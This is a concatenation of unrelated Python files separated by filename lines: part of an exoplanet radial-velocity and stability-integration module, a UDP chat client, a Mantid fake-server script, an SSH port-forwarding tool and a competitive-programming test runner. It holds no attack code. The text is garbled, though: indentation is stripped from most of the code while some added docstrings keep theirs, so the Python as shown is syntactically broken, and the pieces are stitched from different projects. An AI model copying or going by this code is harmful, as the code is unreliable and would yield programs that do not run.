elif obj.tra_GP_rot_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_GP_rot_jeff_pr[i][0],obj.tra_GP_rot_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_GP_rot_bounds[i][0],obj.tra_GP_rot_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.tra_gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.tra_GP_sho_str[i]), width = 30)
if obj.tra_GP_sho_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_GP_sho_norm_pr[i][0],obj.tra_GP_sho_norm_pr[i][1],"$^2$"
elif obj.tra_GP_sho_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_GP_sho_jeff_pr[i][0],obj.tra_GP_sho_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_GP_sho_bounds[i][0],obj.tra_GP_sho_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
if return_text == True:
return text
else:
table_file = open(file_name, 'w')
table_file.write(text)
table_file.close()
print("Done")
return
def f_test(obj, obj2 = None, alpha = 0.01):
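    """
    Nested-model F-test (note added for clarity): compares the fit in `obj`
    against a simpler null model `obj2`; if obj2 is not given, a copy of obj
    with all planets removed is refitted and used as the null model.  With
    chi^2_1, p_1 for the null model and chi^2_2, p_2 for the tested model on
    the same N data points,

        F = [(chi^2_1 - chi^2_2) / (p_2 - p_1)] / [chi^2_2 / (N - p_2)]

    and the p-value is the upper tail of the F(p_2 - p_1, N - p_2)
    distribution; the null hypothesis is rejected when p < alpha.
    """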
chi2 = obj.fit_results.chi2
ndata = len(obj.fit_results.jd)
par2 = obj.fit_results.mfit
# self.value_reduced_chi2.setText("%.4f"%(fit.fit_results.reduced_chi2))
#self.value_loglik.setText("%.4f"%(fit.fit_results.loglik))
# self.value_loglik.setText("%.4f"%(fit.loglik))
if obj2 == None:
obj2 = dill.copy(obj)
obj2.npl = 0
obj2.fitting()
else:
obj2 = dill.copy(obj2)
if len(obj.fit_results.jd) != len(obj2.fit_results.jd):
print("not the same data, test make no sense")
return
chi1 = obj2.fit_results.chi2
par1 = obj2.fit_results.mfit
print(chi2,par1)
#chi1_red = chi1/(ndata - par1)
chi2_red = chi2/(ndata - par2)
#raw_input("chi1_red = %s, Press Enter to continue <Enter>"%chi1_red)
#F = (chi1 - chi2)/chi2_red
F = ((chi1 - chi2)/(par2-par1))/chi2_red
#raw_input("alpha = %s, Press Enter to continue <Enter>"%alpha)
#print F, chi1_red, chi2_red
p_value = pdf.f.sf(F, par2 - par1, ndata - par2, loc=0, scale=1)
print("""
\chi^2 null model = %s
\chi^2 tested model = %s
N parameters null model = %s
N parameters tested model = %s
F value = %s
p-value = %s
alpha value = %s
"""%(chi1,chi2,par1,par2,F,p_value,alpha))
if float(p_value) < alpha:
print("Null hypothesis rejected")
print("Probability = ", (1.0-float(p_value))*100.0,'%')
else:
print("Null hypothesis cannot be rejected")
def a_to_P(a,m0):
GMSUN = 1.32712497e20
AU=1.49597892e11
T = np.sqrt( (a*AU)**3.0 * (2.0*np.pi)**2.0 /(GMSUN*(m0)))
T = T /86400.0
return T
def P_to_a(P,m0):
GMSUN = 1.32712497e20
AU=1.49597892e11
P = P * 86400.0
a = ((P**2.0 * (GMSUN*(m0)))/(4.0*(np.pi)**2.0))**(1.0/3.0)
return a/AU
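# Quick sanity check for the two Kepler's-third-law helpers above (an
# illustrative sketch added here, not part of the original module): for a
# 1 M_sun star, a 1 au orbit corresponds to roughly 365.25 days, and the two
# conversions should be inverses of each other.
if __name__ == "__main__":
    _P_demo = a_to_P(1.0, 1.0)        # ~365.2 days for a = 1 au, m0 = 1 M_sun
    _a_demo = P_to_a(_P_demo, 1.0)    # should recover ~1.0 au
    print("a = 1 au  ->  P = %.2f d  ->  a = %.4f au" % (_P_demo, _a_demo))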
def plot_gp(obj, curve=False):
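    """
    Plot the RV residuals (o-c) per dataset together with the GP model
    (note added for clarity): with curve=True the smooth GP prediction stored
    in obj.gp_model_curve is drawn on a dense time grid, otherwise the GP
    prediction at the data epochs (obj.gp_model_data) is used; the shaded band
    is the +/- 1 sigma range around the GP mean.
    """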
import matplotlib.pyplot as plt
color="#ff7f0e"
colors = ['b','g','r']
x = obj.fit_results.rv_model.jd
y = obj.fit_results.rv_model.o_c
y_err = obj.fit_results.rv_model.rv_err
idset = obj.filelist.idset
if curve==True:
x_model = np.linspace(min(x), max(x), 5000) #obj.fit_results.model_jd
mu,var,std = obj.gp_model_curve
else:
x_model = x
mu,var,std = obj.gp_model_data
#print(mu[0:10])
#print(y[0:10])
for i in range(obj.filelist.ndset):
plt.errorbar(x[idset==i],y[idset==i], yerr=y_err[idset==i], fmt=".",color=colors[i], capsize=0);
plt.plot(x_model, mu, color = '0.5' );
plt.fill_between(x_model ,mu+std, mu-std, color=color, alpha=0.3, edgecolor="none")
def plot_transit_gp(obj, curve=False):
import matplotlib.pyplot as plt
color="#ff7f0e"
colors = ['b','g','r']
x = obj.tra_data_sets[0][0]
y = obj.tra_data_sets[0][1]
y_err = obj.tra_data_sets[0][2]
#idset = obj.filelist.idset
if curve==True:
x_model = np.linspace(min(x), max(x), 5000) #obj.fit_results.model_jd
mu,var,std = obj.tra_gp_model_curve
else:
x_model = x
mu,var,std = obj.tra_gp_model_data
#print(mu[0:10])
#print(y[0:10])
#for i in range(obj.filelist.ndset):
#plt.errorbar(x[idset==i],y[idset==i], yerr=y_err[idset==i], fmt=".",color=colors[i], capsize=0);
plt.errorbar(x,y, yerr=y_err, fmt=".",color=colors[0], capsize=0);
plt.plot(x_model, mu, color = '0.5' );
plt.fill_between(x_model ,mu+std, mu-std, color=color, alpha=0.3, edgecolor="none")
####################### mass_semimajor ###########################################
def mass_a_from_Kepler_fit(a,npl,m0):
'''Calculates the actual masses and Jacobi semimajor axes of a
system for assumed sin(i) using the parameters P, K and e from a Kepler fit
The output is now in Mjup and AU
'''
THIRD = 1.0/3.0
PI = 3.14159265358979e0
TWOPI = 2.0*PI
GMSUN = 1.32712497e20
AU=1.49597892e11
incl = 90.0
sini = np.sin(PI*(incl/180.0))
mass = np.zeros(npl+1)
ap = np.zeros(npl)
pl_mass = np.zeros(npl)
mpold = pl_mass
#*******G is set to be unit, and s, m, kg as unit of time, length and mass
#***** and there is a reason for that! later I might correct for that.
mtotal = m0
f = 5e-6
for i in range(npl):
T = a[5*i+1]*86400.0
mass[0] = m0
        # we need an initial guess for each planet mass
dm = 0
mass[i+1] = abs(a[5*i])*(T*(m0)**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
mpold[i] = mass[i+1]
# This is a simple iteration to solve for mp
while (dm <= 0):
if i == 0:
mtotal = m0
mass[i+1] = abs(a[5*i])*(T*(m0 + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
else:
mtotal = m0
for j in range(i):
mtotal = mtotal + mass[j+1]
mass[i+1] = abs(a[5*i])*(T*(mtotal + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
dm = (mpold[i] - mass[i+1])
mpold[i] = mpold[i] + f
# print mass[i+1], mpold[i]
ap[i] = (GMSUN*(mtotal + mass[i+1])*(T/TWOPI)**2)**THIRD
# for i in range(npl+1):
# mass[i] = mass[i]*GMSUN
for i in range(npl):
ap[i] = ap[i]/AU # to be in AU
pl_mass[i] = mass[i+1]*1047.70266835 # to be in Jup. masses
# I have seen that 1 Sol Mass = 1047.92612 Jup. masses???
return pl_mass,ap
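# Illustrative call of mass_a_from_Kepler_fit (a sketch with made-up numbers,
# not taken from the original module): the routine expects five elements per
# planet, of which only K [m/s], P [day] and e (slots 0, 1 and 2) are used,
# plus the number of planets and the stellar mass in solar masses, e.g.
#   pl_mass, ap = mass_a_from_Kepler_fit([50.0, 400.0, 0.1, 0.0, 0.0], 1, 1.0)
# which returns the planet mass (for sin i = 1) in Jupiter masses and the
# semimajor axis in au.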
def run_stability(obj, timemax=3000.0, timestep=10, timeout_sec=1000.0, stab_save_dir = './', integrator='symba'):
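    """
    Long-term stability run via the bundled SWIFT-style Fortran integrators
    (note added for clarity): writes param.in and geninit_j.in from the
    current best-fit orbital elements, runs the chosen integrator ('symba',
    'mvs' or 'mvs_gr') inside ./stability/, and loads the resulting
    energy.out and per-planet pl_*.out files into the obj.evol_* arrays
    (times converted to years).  timemax is in years; timestep is passed
    through unchanged as the integrator dt.
    """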
#if not os.path.exists(directory):
# os.makedirs(directory)
if integrator=='symba':
os.chdir('./stability/symba/')
elif integrator=='mvs':
os.chdir('./stability/mvs/')
elif integrator=='mvs_gr':
os.chdir('./stability/mvs_gr/')
print("running stability with: %s"%integrator)
    ##### create the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
    max_time = float(timemax)*365.25 # convert to days
param_file.write(b"""0.0d0 %s %s
%s %s
F T T T T F
0.0001 50.0 50.0 -1. T
bin.dat
unknown
"""%(bytes(str(max_time).encode()),
bytes(str(timestep).encode()),
bytes(str(max_time/1e4).encode()),
bytes(str(max_time/1e3).encode()) ))
param_file.close()
#os.system("cp param.in test_param.in__")
getin_file = open('geninit_j.in', 'wb')
getin_file.write(b"""1
%s
%s
1.d0
pl.in
"""%(bytes(str(obj.params.stellar_mass).encode()), bytes(str(obj.npl).encode() ) ))
for j in range(obj.npl):
getin_file.write(b'%s \n'%bytes(str(obj.fit_results.mass[j]/1047.70266835).encode()))
getin_file.write(b'%s %s %s %s %s %s \n'%(bytes(str(obj.fit_results.a[j]).encode()),
bytes(str(obj.params.planet_params[7*j + 2]).encode()),
bytes(str(obj.params.planet_params[7*j + 5]).encode()),
bytes(str(obj.params.planet_params[7*j + 3]).encode()),
bytes(str(obj.params.planet_params[7*j + 6]).encode()),
bytes(str(obj.params.planet_params[7*j + 4]).encode() )) )
getin_file.close()
    # running the fortran codes
result, flag = run_command_with_timeout('./geninit_j3_in_days < geninit_j.in', timeout_sec)
if integrator=='symba':
result, flag = run_command_with_timeout('./swift_symba5_j << EOF \nparam.in \npl.in \n1e-40 \nEOF', timeout_sec)
elif integrator=='mvs':
result, flag = run_command_with_timeout('./swift_mvs_j << EOF \nparam.in \npl.in \nEOF', timeout_sec)
elif integrator=='mvs_gr':
result, flag = run_command_with_timeout('./swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%int(obj.GR_step), timeout_sec)
#print('./swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%obj.GR_step)
if not os.path.exists("energy.out"):
os.chdir('../../')
print("something went wrong!!! No output generated.")
return obj
obj.evol_T_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [1])
# obj.evol_momentum = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['lx'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['ly'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_momentum['lz'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [4])
for k in range(obj.npl):
if integrator=='symba':
result, flag = run_command_with_timeout('./follow_symba2 << EOF \nparam.in \npl.in \n%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow_symba.out pl_%s.out'%(k+1),timeout_sec)
elif integrator=='mvs' or integrator=='mvs_gr':
result, flag = run_command_with_timeout('./follow2 << EOF \nparam.in \npl.in \n-%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow2.out pl_%s.out'%(k+1),timeout_sec)
obj.evol_T[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_a[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_e[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_p[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [6])
obj.evol_M[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [7])
obj.evol_i[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [4])
obj.evol_Om[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [5])
obj.evol_Per[k] = a_to_P(obj.evol_a[k],obj.params.stellar_mass)
try:
os.system('rm *.out *.dat *.in')
#os.system('mv *.out *.dat *.in last_run')
except OSError:
pass
os.chdir('../../')
print("stability with: %s done!"%integrator)
return obj
def run_stability_arb(obj, timemax=3000.0, timestep=10, timeout_sec=1000.0, stab_save_dir = './', integrator='symba'):
#if not os.path.exists(directory):
# os.makedirs(directory)
if integrator=='symba':
os.chdir('./stability/symba/')
elif integrator=='mvs':
os.chdir('./stability/mvs/')
elif integrator=='mvs_gr':
os.chdir('./stability/mvs_gr/')
print("running stability with: %s"%integrator)
    ##### create the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
    max_time = float(timemax)*365.25 # convert to days
param_file.write(b"""0.0d0 %s %s
%s %s
F T T T T F
0.0001 50.0 50.0 -1. T
bin.dat
unknown
"""%(bytes(str(max_time).encode()),
bytes(str(timestep).encode()),
bytes(str(max_time/1e4).encode()),
bytes(str(max_time/1e3).encode()) ))
param_file.close()
#os.system("cp param.in test_param.in__")
getin_file = open('geninit_j.in', 'wb')
getin_file.write(b"""1
%s
%s
1.d0
pl.in
"""%(bytes(str(obj.arb_st_mass).encode()), bytes(str(obj.npl_arb).encode() ) ))
for j in range(9):
if obj.pl_arb_use[j] == True:
getin_file.write(b'%s \n'%bytes(str(obj.mass_arb[j]/1047.70266835).encode()))
getin_file.write(b'%s %s %s %s %s %s \n'%(bytes(str(obj.a_arb[j]).encode()),
bytes(str(obj.e_arb[j]).encode()),
bytes(str(obj.i_arb[j]).encode()),
bytes(str(obj.w_arb[j]).encode()),
bytes(str(obj.Node_arb[j]).encode()),
bytes(str(obj.M0_arb[j]).encode() )) )
else:
continue
#
getin_file.close()
    # running the fortran codes
result, flag = run_command_with_timeout('./geninit_j3_in_days < geninit_j.in', timeout_sec)
if integrator=='symba':
result, flag = run_command_with_timeout('./swift_symba5_j << EOF \nparam.in \npl.in \n1e-40 \nEOF', timeout_sec)
elif integrator=='mvs':
result, flag = run_command_with_timeout('./swift_mvs_j << EOF \nparam.in \npl.in \nEOF', timeout_sec)
elif integrator=='mvs_gr':
result, flag = run_command_with_timeout('./swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%int(obj.GR_step), timeout_sec)
if not os.path.exists("energy.out"):
os.chdir('../../')
print("something went wrong!!! No output generated.")
return obj
obj.evol_T_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [1])
# obj.evol_momentum = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['lx'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['ly'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_momentum['lz'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [4])
for k in range(obj.npl_arb):
if integrator=='symba':
result, flag = run_command_with_timeout('./follow_symba2 << EOF \nparam.in \npl.in \n%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow_symba.out pl_%s.out'%(k+1),timeout_sec)
elif integrator=='mvs' or integrator=='mvs_gr':
result, flag = run_command_with_timeout('./follow2 << EOF \nparam.in \npl.in \n-%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow2.out pl_%s.out'%(k+1),timeout_sec)
obj.evol_T[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_a[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_e[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_p[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [6])
obj.evol_M[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [7])
obj.evol_i[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [4])
obj.evol_Om[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [5])
obj.evol_Per[k] = a_to_P(obj.evol_a[k],obj.params.stellar_mass)
try:
os.system('rm *.out *.dat *.in')
#os.system('mv *.out *.dat *.in last_run')
except OSError:
pass
os.chdir('../../')
print("stability with: %s done!"%integrator)
return obj
|
chatClient.py
|
import socket
import threading
import time
tLock = threading.Lock()
shutDown = False
def receving(name, sock):
while not shutDown:
try:
while True:
data, addr = sock.recvfrom(1024)
print str(data)
except Exception as e:
if str(e) == "[Errno 35] Resource temporarily unavailable":
continue
else:
print e
else:
pass
finally:
pass
host = '127.0.0.1'
port = 0
server = ('127.0.0.1', 5000)
s= socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((host, port))
s.setblocking(0)
rT = threading.Thread(target = receving, args = ("RecvThread", s))
rT.start()
alias = raw_input("Name: ")
message = raw_input(alias + "->")
while message != 'q' and not shutDown:
if message != '' :
s.sendto(alias + ": " + message, server)
time.sleep(0.2)
message = raw_input(alias + "->")
else:
client_input = raw_input("end? \n 'y' to quit\n 'n' to continue\n")
if "y" in client_input:
shutDown = True
elif "n" in client_input:
message = "reconnecting..."
else:
pass
rT.join()
s.close()
|
fake_server.py
|
from __future__ import (absolute_import, division, print_function)
from mantid import AlgorithmManager, ConfigService
from mantid.simpleapi import FakeISISHistoDAE
from threading import Thread
facility = ConfigService.getFacility().name()
ConfigService.setFacility('TEST_LIVE')
def startServer():
FakeISISHistoDAE(NPeriods=5, NSpectra=10, NBins=100)
# This will generate 5 periods of histogram data, 10 spectra in each period,
# 100 bins in each spectrum
try:
thread = Thread(target=startServer)
thread.start()
thread.join()
except Exception as e:
print(e)
alg = AlgorithmManager.newestInstanceOf('FakeISISHistoDAE')
if alg.isRunning():
alg.cancel()
finally:
ConfigService.setFacility(facility)
|
cpt.py
|
#!/usr/bin/env python
# Copyright (c) 2022 Vitaly Yakovlev <vitaly@optinsoft.net>
#
# CPT.py
#
# This script allows to forward multiple local ports to the remote host:port via SSH.
# If argument "count" equals 1 then it works exactly as this command:
#
# ssh -L local_port:remote_ip:remote_port ssh_user@ssh_host -i ssh_keyfile
#
# If count = 2 then it is similar to run 2 parallel commands:
#
# ssh -L local_port:remote_ip:remote_port ssh_user@ssh_host -i ssh_keyfile
# ssh -L (local_port+1):(remote_ip+1):remote_port ssh_user@ssh_host -i ssh_keyfile
#
# etc.
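#
# A hypothetical invocation (values are placeholders, not from this repo):
#
#   python cpt.py --local-port 8000 --remote-ip 10.0.0.10 --remote-port 80 \
#       --count 3 --ssh-host bastion.example.com --ssh-user deploy \
#       --ssh-keyfile ~/.ssh/id_rsa
#
# would listen on local ports 8000-8002 and forward them to
# 10.0.0.10:80, 10.0.0.11:80 and 10.0.0.12:80 through the SSH host.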
import paramiko, sys
from forward import ForwardServer, Handler
import threading
import sys, os
from termcolor import colored
import argparse
import ipaddress
from dotenv import load_dotenv
import json
from cptutils import CommandHandler
def forward_tunnel_server(local_port, remote_host, remote_port, transport):
# this is a little convoluted, but lets me configure things for the Handler
# object. (SocketServer doesn't give Handlers any way to access the outer
# server normally.)
class SubHander(Handler):
chain_host = remote_host
chain_port = remote_port
ssh_transport = transport
server = ForwardServer(("", local_port), SubHander)
server.local_port = local_port
server.remote_host = remote_host
server.remote_port = remote_port
return server
def main():
load_dotenv()
parser = argparse.ArgumentParser(description="CPT.py")
parser.add_argument('--config', help='path to the configuration file (JSON); you can either provide command line arguments to cpt.py or use the configuration file')
parser.add_argument('--local-port', type=int, help='local (client) port is to be forwarded to the REMOTE_IP:REMOTE_PORT')
parser.add_argument('--remote-ip', help='remote host IP')
parser.add_argument('--remote-port', type=int, help='remote host port')
parser.add_argument('--count', default=1, type=int, help='count of the forwarded ports; first local port will be forwarded to the REMOTE_IP:REMOTE_PORT, second - to the REMOTE_IP+1:REMOTE_PORT, etc.')
parser.add_argument('--ssh-host', help='SSH host')
parser.add_argument('--ssh-port', default=22, type=int, help='SSH port')
parser.add_argument('--ssh-user', help='SSH user')
parser.add_argument('--ssh-keyfile', help='SSH private key file')
args = parser.parse_args()
if (args.config):
with open(args.config, 'rt') as f:
t_args = argparse.Namespace()
t_args.__dict__.update(json.load(f))
args = parser.parse_args(namespace=t_args)
required_arg_names = ['local_port', 'remote_ip', 'remote_port',
'count', 'ssh_host', 'ssh_port', 'ssh_user', 'ssh_keyfile']
vargs = vars(args)
missed_args = ", ".join(filter(lambda name : vargs[name] is None, required_arg_names))
if (missed_args):
parser.print_usage()
print("error: the following arguments are required: ", missed_args)
sys.exit(0)
remote_ip = ipaddress.ip_address(args.remote_ip)
count = args.count
remote_port = args.remote_port
local_port = args.local_port
ssh_host = args.ssh_host
ssh_port = args.ssh_port
ssh_user = args.ssh_user
ssh_keyfile = args.ssh_keyfile
ssh_key = paramiko.RSAKey.from_private_key_file(ssh_keyfile)
transport = paramiko.Transport((ssh_host, ssh_port))
transport.connect(hostkey = None,
username = ssh_user,
pkey = ssh_key)
forward_servers = []
forwarding_threads = []
for i in range(0, count):
remote_host = str(remote_ip + i)
forward_servers.append(forward_tunnel_server(local_port+i, remote_host, remote_port, transport))
cmdhandler = CommandHandler(forward_servers)
try:
for server in forward_servers:
forwarding_threads.append(threading.Thread(target=server.serve_forever))
print("Start forwarding...")
for thread in forwarding_threads:
thread.setDaemon(True)
thread.start()
cmdhandler.print_hint()
while not cmdhandler.terminated:
try:
cmd = input(colored('(cpt) ', 'green'))
cmdhandler.handle(cmd)
except KeyboardInterrupt:
                break  # Ctrl-C: leave the command loop so the tunnels get shut down
except Exception as e:
print(str(e))
finally:
print('Terminating...')
# stop servers
for server in forward_servers:
server.shutdown()
# waiting other threads for complete:
for thread in forwarding_threads:
thread.join()
print('Port forwarding stopped.')
sys.exit(0)
if __name__ == "__main__":
main()
|
cp.py
|
try :
import os
import subprocess
import json
from termcolor import colored as clr , cprint
import time
from itertools import zip_longest
from tqdm import tqdm
import threading
import socket
import getpass
from settings.compiler import competitive_companion_port, parse_problem_with_template
from settings.compiler import template_path , coder_name
from system.get_time import digital_time
from data.get_template import get_template
from tools.run_program import if_run_type
except Exception as e:
print(e)
cp_keys = ['-cp','-Cp']
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class Cp_my_tester:
TLE = 4
def diff_print(self,name,value):
print(' '+name+' :')
for x in value:
x = ' '+ x
print(x)
def different(self,value,output,expected,case):
x = output.split('\n')
y = expected.split('\n')
i = value.split('\n')
pt = ' '+'-'*5+'Problem Found in '+case+'-'*5
cprint(pt,'yellow')
# print('Input :')
# print(value)
self.diff_print('Input',i)
self.diff_print('Output',x)
self.diff_print('Expected',y)
# print('Output :')
# print(output)
# print("Expected :")
# print(expected)
print(" Difference :")
for wx,wy in zip_longest(x,y,fillvalue=''):
print(' ',end='')
for o , e in zip_longest(wx,wy,fillvalue=''):
if(o == e):
cprint(o,'green',end='')
else :
cprint(o,'red',end='')
cprint(e,'yellow',end='')
print()
cprint(' '+'-'*(len(pt)-2),'yellow')
# def sub_process(self,cmd,value):
# tle = False
# try :
# x = subprocess.call(cmd,stdin=subprocess.PIPE,stdout=subprocess.PIPE,timeout=self.TLE)
# with x.stdin as f:
# f.write(value.encode())
# result = (x.communicate()[0]).decode('utf-8')
# except :
# result = "$TLE$"
# tle = True
# return (result,tle)
def sub_process(self,cmd,value):
x = subprocess.Popen(cmd,stdin=subprocess.PIPE,stdout=subprocess.PIPE)
with x.stdin as f:
f.write(value.encode())
result = (x.communicate()[0]).decode('utf-8')
# print(result)
return (result,False)
def test(self,file_name):
path = os.getcwd()
# print(path, file_name)
pt='-'*20+file_name+'-'*20
cprint(pt,'magenta')
pt = (' '*17+"...Testing...")
cprint(pt,'blue')
print()
case_folder = 'testcases'
if os.path.isdir(case_folder):
pass
elif os.path.isdir('test'):
case_folder = 'test'
else:
cprint("Test folder not available.",'red',attrs=['bold'])
return
file_path = os.path.join(path,case_folder)
lt = os.listdir(file_path)
# print(lt)
if len(lt) == 0 :
            cprint('No test file available.')
return
ext = file_name.rsplit(sep='.',maxsplit=1)
type = ''
if len(ext) > 1 :
if ext[1] == 'cpp':
type = 'cpp'
elif ext[1] == 'py':
type = 'py'
if type == 'cpp':
cmd = f"g++ '{file_name}' -o test.out"
t = time.time()
okk = os.system(cmd)
if okk != 0:
cprint("Compilation Error, sir.",'red')
return
t = time.time() - t
t = '{:.4f}'.format(t)
pt = (f' # Compilation time {t} s')
cprint(pt,'blue')
passed = 0
failed = 0
test_files =[]
cases = 0
for file in lt:
ext = file.rsplit(sep='.',maxsplit=1)
# print(f'file = {ext}')
try :
if ext[1] == 'in':
out = ext[0] + '.out'
if os.path.isfile(os.path.join(file_path,out)):
test_files.append((file,out))
cases += 1
else:
# print(f'{out} not found.')
pass
except :
pass
if cases == 0:
cprint(" # No testcase available.",'red')
return
if cases == 1:
cprint(" # 1 testcase found.",'yellow')
else :
cprint(f' # {cases} testcases found','yellow')
st = -1.0
slowest = ''
is_tle = False
for f in test_files:
file = f[0]
out = f[1]
# print(f'testing {file} with {out}')
ext = file.rsplit(sep='.',maxsplit=1)
with open(os.path.join(file_path,file),'r') as f:
value = f.read()
t = time.time()
if type == 'cpp':
result = self.sub_process(['./test.out'],value)
elif type =='py':
result = self.sub_process(['python3',file_name],value)
else:
result = ('',False)
tle = result[1]
result = result[0]
t = time.time() - t
if t > st:
st = t
slowest = ext[0]
# t = '{:.4}'.format(t)
t = f'{t:.4f}'
# print('code :\n',result)
print()
cprint(' * '+ext[0],'yellow')
cprint(' * Time : ','cyan',end='')
if tle :
cprint('TLE','red')
is_tle = True
else :
cprint(t,'cyan')
with open(os.path.join(file_path,out)) as f:
ans = f.read()
# print('Expected :\n',ans)
if result == ans:
cprint(' * Passed','green')
passed += 1
else :
cprint(' * WA','red')
failed += 1
if tle == False:
self.different(value,result,ans,ext[0])
else :
is_tle = True
print()
st = f'{st:.4f}'
pt = f' # Slowest : '
cprint(pt,'blue', end='')
if is_tle :
cprint('TLE','red',end='')
else :
cprint(st,'blue',end='')
cprint(' ['+slowest+']','blue')
pt = (f' # Status : {passed}/{passed+failed} (AC/Total)')
cprint(pt,'yellow')
if failed == 0:
cprint(" # Passed....",'green')
else :
cprint(" # Failed....",'red')
if os.path.isfile('test.out'):
os.remove('test.out')
print()
pt='-'*20+'-'*len(file_name)+'-'*20
cprint(pt,'magenta')
def find_files(self,file_name=''):
file_list = []
# print(file_name)
supported_ext = ['cpp','py']
# print(os.getcwd)
for file in os.listdir(os.getcwd()):
try :
ext = file.rsplit(sep='.',maxsplit=1)
for i in supported_ext:
if ext[1] == i:
if file_name in file:
file_list.append(file)
except:
pass
# print(file_list)
sz = len(file_list)
if sz == 1:
self.test(file_list[0])
elif sz > 1:
no = 1
cprint("All the available files are given below.\n",'yellow')
for file in file_list:
pt = (' '*4+str(no)+') '+file)
cprint(pt,'blue')
no += 1
cprint(' '*4+'0) Cancel operation','red')
print()
while True:
cprint("Select the file index : ",'cyan',end='')
index = int(input())
if index == 0:
cprint("Testing operation cancelled.",'red')
break
elif index < no:
self.test(file_list[index-1])
break
else:
cprint("You have entered the wrong index.Please try again.",'red')
else :
cprint("NO FILE FOUND :(",'red')
class Cp_Problem:
def fetch_problem(self,url = ''):
try :
cprint(' '*17+'...Parsing Problem...'+' '*17,'blue')
if url == '':
cprint('Enter the url : ','cyan',end='')
url = input()
cprint('-'*55,'magenta')
# os.system(cmd)
cmd = 'oj-api get-problem ' + url
cmd = list(cmd.split())
cp = subprocess.run(cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
problem = json.loads(cp.stdout)
# with open('problem.json','w') as f:
# f.write(cp.stdout)
